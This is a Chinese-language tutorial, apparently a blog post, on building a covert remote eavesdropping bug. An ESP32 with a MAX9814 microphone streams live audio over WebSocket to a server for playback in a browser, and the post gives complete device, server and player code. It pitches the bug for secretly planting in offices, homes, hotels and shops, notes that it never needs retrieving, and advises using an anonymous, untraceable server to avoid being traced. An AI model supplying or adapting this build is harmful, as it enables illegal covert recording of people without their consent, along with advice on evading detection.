用ESP32实现一个远程窃听器

本窃听器不再像普通窃听器一样受限于无线电的传输距离，千里之外依然能正常窃听，适用于办公场所、家庭、酒店、固定营业场所等有WiFi的地方。本窃听器也不需要将数据写入SD卡之后再回收读取数据，因此安装之后就不用再回去拆除。但是该窃听器的程序会访问服务器来传输数据，所以如果没有能完全匿名、匿迹的服务器就最好审慎使用。

捕获音频

我试验的时候用的音频采集设备（声音传感器）是MAX9841:

ESP32开发板是，NodeMCU-32S

连线方式是将MAX9841的Out引脚与ESP32的SVP引脚相连。

设置音频采样频率

// 采样率，8000Hz是电话所用采样率，对于人的说话已经足够
// 采样率太高的话，后续带宽会更高
#define SAMPLE_RATE (8000)

初始化MAX9814，用16bit采样，也可以用24bit或32bit采样，用其它采样位数的话也会影响带宽。

void setup_max9814() {
  i2s_config_t i2s_config = {
    .mode = (i2s_mode_t)(I2S_MODE_MASTER | I2S_MODE_RX | I2S_MODE_TX | I2S_MODE_DAC_BUILT_IN | I2S_MODE_ADC_BUILT_IN),
    .sample_rate = SAMPLE_RATE,
    .bits_per_sample = I2S_BITS_PER_SAMPLE_16BIT,
    .channel_format = I2S_CHANNEL_FMT_RIGHT_LEFT,
    .communication_format = (i2s_comm_format_t)(I2S_COMM_FORMAT_I2S | I2S_COMM_FORMAT_I2S_MSB),
    .intr_alloc_flags = 0,
    .dma_buf_count = 16,
    .dma_buf_len = 60
  };


  Serial.println("using ADC_builtin");
  i2s_driver_install(I2S_NUM_0, &i2s_config, 0, NULL);

  // 使用ESP32的GPIO36, 也就是ADC0、SVP引脚来采样
  i2s_set_adc_mode(ADC_UNIT_1, ADC1_CHANNEL_0);
}

通过esp32的i2s函数来捕获音频数据，捕获上来的数据是双声道的PCM数据，我们要求没有那么高，只留下一个声道的数据。

然后通过websocket将数据发往服务器。

void capture_audio() {
  i2s_read_bytes(I2S_NUM_0, (char *)audioBuf, audioBufSize, portMAX_DELAY);

  // 只要单声道数据
  uint16_t *buf = (uint16_t *)audioBuf;
  int to = 0;
  for (int i = 0; i < audioBufSize / 2; i += 2) {
    buf[to] = buf[i];
    to++;
  }
  
  client.sendBinary((const char *)audioBuf, audioBufSize / 2);
  Serial.println("read and send audio data");
}

服务器实现

服务器的接收处理方式与《将ESP32-CAM的视频流直播到外网》所述方式基本一样。这里就不再详述。

在服务器处理唯一需要注意的是，服务器的缓冲区不宜设得过大，因为声音的延时很敏感，如果缓冲区设得过大就没有实时感。

func init() {
	frameChan = make(chan []byte, 8) // 缓存8个足够
}

网页播放PCM音频数据

Player的代码

注意，这里的sampleRate必需与ESP32的采样率对应起来。

另外putAudioData是按16bit的采样位数来实现的，如果要采用24bit或32bit采样位，这部分代码也要相应修改。

class PcmDataPlayer {
  constructor() {
    this.sampleRate = 8000;
    this.flushTime = 1000;
    this.audioSamples = new Float32Array();

    var AudioContext = window.AudioContext || window.webkitAudioContext; // iOS 上必需使用 window.webkitAudioContext
    this.audioCtx = new AudioContext();
    this.gainNode = this.audioCtx.createGain();
    this.gainNode.connect(this.audioCtx.destination);
    this.startTime = this.audioCtx.currentTime;

    setInterval(this.play.bind(this), this.flushTime);
  }
  play() {
    const length = this.audioSamples.length;

    if (0 == length) {
      return
    }

    const audioBuffer = this.audioCtx.createBuffer(1, length, this.sampleRate);
    const audioData = audioBuffer.getChannelData(0);
    for (let i = 0; i < length; i++) {
      audioData[i] = this.audioSamples[i];
    }

    if (this.startTime < this.audioCtx.currentTime) {
      this.startTime = this.audioCtx.currentTime;
    }
    console.log('start vs current ' + this.startTime.toFixed(2) + ' vs ' + this.audioCtx.currentTime.toFixed(2) + ' duration: ' + audioBuffer.duration.toFixed(2));

    var bufferSource = this.audioCtx.createBufferSource();
    bufferSource.buffer = audioBuffer;
    bufferSource.connect(this.gainNode);
    bufferSource.start(this.startTime);
    this.startTime += audioBuffer.duration;
    this.audioSamples = new Float32Array();
  }

  putAudioData(data) {
    let float32Data = new Float32Array(data.length);
    for (let i = 0; i < data.length; i++) {
      float32Data[i] = data[i] / (32768.0/5.0);
    }

    const tmp = new Float32Array(this.audioSamples.length + float32Data.length);
    tmp.set(this.audioSamples, 0);
    tmp.set(float32Data,       this.audioSamples.length);
    this.audioSamples = tmp;
  }
}

由于websocket默认推送的是Blob数据，而Player需要的是ArrayBuffer，因此创建WebSocket时，加了一句ws.binaryType = 'arraybuffer';

function play() {
  var player = new PcmDataPlayer();

  function initWebsocket() {
    ws = new WebSocket(wsURL);
    ws.binaryType = 'arraybuffer';
    ws.SendCmd = function(req) {
      req = JSON.stringify(req);
      ws.send(req);
    }

    ws.onopen = function () {
      Msg("websocket opened");
    };

    ws.onerror = function (event) {
      Msg("websocket error: " + event);
    };

    ws.onclose = function (event) {
      Msg("websocket closed with code: " + event.code + " reason: " + event.reason);
    };

    ws.onmessage = function (event) {
      data = event.data;
      frameCount++;
      totalBytes += data.byteLength;

      data = Array.prototype.slice.call(new Uint16Array(data));
      player.putAudioData(data);
    };
  }
  
  initWebsocket();
}